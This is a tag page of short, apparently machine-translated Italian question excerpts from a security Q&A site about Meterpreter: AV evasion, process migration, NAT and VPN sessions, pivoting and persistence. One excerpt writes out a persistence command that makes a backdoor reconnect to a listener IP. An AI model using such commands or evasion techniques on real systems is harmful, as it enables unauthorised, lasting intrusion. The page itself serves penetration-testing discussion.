Domande con tag 'meterpreter'

domande con tag
2
risposte

Meterpreter HTTPS rilevato da IPS

Sono impegnato con i test di sicurezza su una rete di clienti e mi è stato chiesto di mostrare quanto è semplice evasione AV. Ho creato un bel file HTTPS inverso con powershell tramite veil-evasion, che non viene rilevato da Symantec virusscanne...
posta 09.01.2017 - 09:09
2
risposte

La shell Meterpreter e la shell di sistema sono definite?

Qual è la differenza tra la shell Meterpreter e la shell di sistema? Ad esempio, se trovassi qualche vulnerabilità in un sistema che consentiva entrambe le shell, cosa dovrei fare per, shell di sistema o Meterpreter shell ? Che tipo di co...
posta 30.06.2018 - 07:05
1
risposta

Come si esegue la migrazione di Meterpreter a 32 bit in un processo a 64 bit?

Se hai un misuratore a 32 bit in esecuzione su un sistema remoto a 64 bit, puoi eseguire la migrazione in processi a 64 bit. Questo non è nulla di nuovo ed è stato usato da malware per anni ma la cosa che mi fa pensare è come lo fa su Windows...
posta 14.01.2017 - 23:24
2
risposte

Non ricevo sessioni meterpreter quando sono connesso a Openvpn

Ho un router e le porte necessarie per la connessione di backdoor al listener vengono inoltrate all'IP interno della mia macchina. Funziona tutto bene solo quando non utilizzo VPN. Ma dopo essermi connesso a una VPN non ho ricevuto alcuna ses...
posta 16.06.2017 - 17:25
1
risposta

Aggiorna shell a meterpreter dietro NAT

Ho giocato con Metasploit la scorsa settimana e sono riuscito a ottenere una shell di base della vittima su Internet. Al momento ho: Crea un DDNS che punta al mio IP pubblico Configura il port forwarding per tutte le porte importanti che...
posta 24.09.2015 - 03:34
1
risposta

Come funziona la persistenza di metasploit?

Quando eseguiamo il remote exploit di un target con meterpreter, possiamo usare il comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 per creare un programma persistente che proverà a connettersi alla macchina quale indirizzo IP è 19...
posta 03.04.2016 - 16:41
1
risposta

Che cosa fa sì che un payload di PowerShell venga eseguito per la prima volta ma non il secondo?

Ho creato un payload powershell di windows / meterpreter / reverse_https usando lo script python fornito alla fine di questo articolo. Nella prima esecuzione, la sessione meterpreter si è aperta correttamente, quando l'ho chiusa e ho cercato d...
posta 09.03.2014 - 14:23
1
risposta

Errore Meterpreter SSL dopo il sonno

Mentre uso intensamente metasploit sui pentests, comincio a usare il comando meterpreter sleep . Capisco che questo non è un metodo di persistenza, ma a volte è molto conveniente. Purtroppo, quando le sessioni si sveglia non riescono a stabi...
posta 01.10.2016 - 16:18
1
risposta

Metasploit: pivoting per la macchina senza accesso a Internet

Immaginiamo il seguente scenario (non insolito): Sto facendo un pentest dall'esterno Ho una sessione meterpreter da un PC aziendale all'interno della loro infrastruttura (diciamo w / reverse HTTPS) Diciamo che conosco il dominio admin pw...
posta 21.04.2018 - 20:59
1
risposta

Meterpreter su Iphone non jailbroken [chiuso]

L'ho trovato su github: link Qualcuno sa se funziona su un Iphone non jailbroken? L'ho scaricato sul mio e ho fatto doppio clic sull'icona Makefile, all'interno della directory OSX, ma il mio sistema operativo continua a dire: "Makefile"...
posta 18.12.2014 - 14:45